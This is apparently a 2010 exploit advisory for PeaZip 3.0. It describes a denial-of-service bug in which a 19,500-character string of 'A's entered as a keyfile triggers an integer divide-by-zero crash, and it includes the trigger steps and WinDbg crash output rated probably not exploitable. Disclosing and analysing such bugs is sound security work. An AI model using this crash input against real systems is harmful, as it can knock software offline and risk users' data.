# Exploit Title: Peazip 3.0 DOS attack
# Date: 30/03/2010
# Author: Richard leahy
# Software Link:
# Version: 3.0
# Tested on: Windows Xp Sp2
# Code : no code just print out the A's and paste them into the input box
Peazip 3.0 suffers from a division by zero attack resulting in denial of service vulnerability and possibly loss of data.
To trigger the vulnerability open up the application, click tools, enter password / keyfile.
password: test
confirm password: test
keyfile:"A" * 19500
kind regards
richard leahy
(d80.8c): Integer divide-by-zero - code c0000094 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000032 ebx=00000032 ecx=00000000 edx=00000000 esi=0173f754 edi=01dd7dd8
eip=00524ea2 esp=0173f438 ebp=0173f440 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
image00400000+0x124ea2:
00524ea2 f7f9 idiv eax,ecx
0:000> !exploitable
No export exploitable found
0:000> !load winext/msec.dll
0:000> !exploitable
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\system32\USER32.dll -
Exploitability Classification: PROBABLY_NOT_EXPLOITABLE
Recommended Bug Title: Integer Divide By Zero starting at image00400000+0x0000000000124ea2 (Hash=0x00020e6f.0x637a584a)
This is a divide by zero, and is probably not exploitable.
________________________________
Hotmail: Free, trusted and rich email service. Get it now.<https://signup.live.com/signup.aspx?id=60969>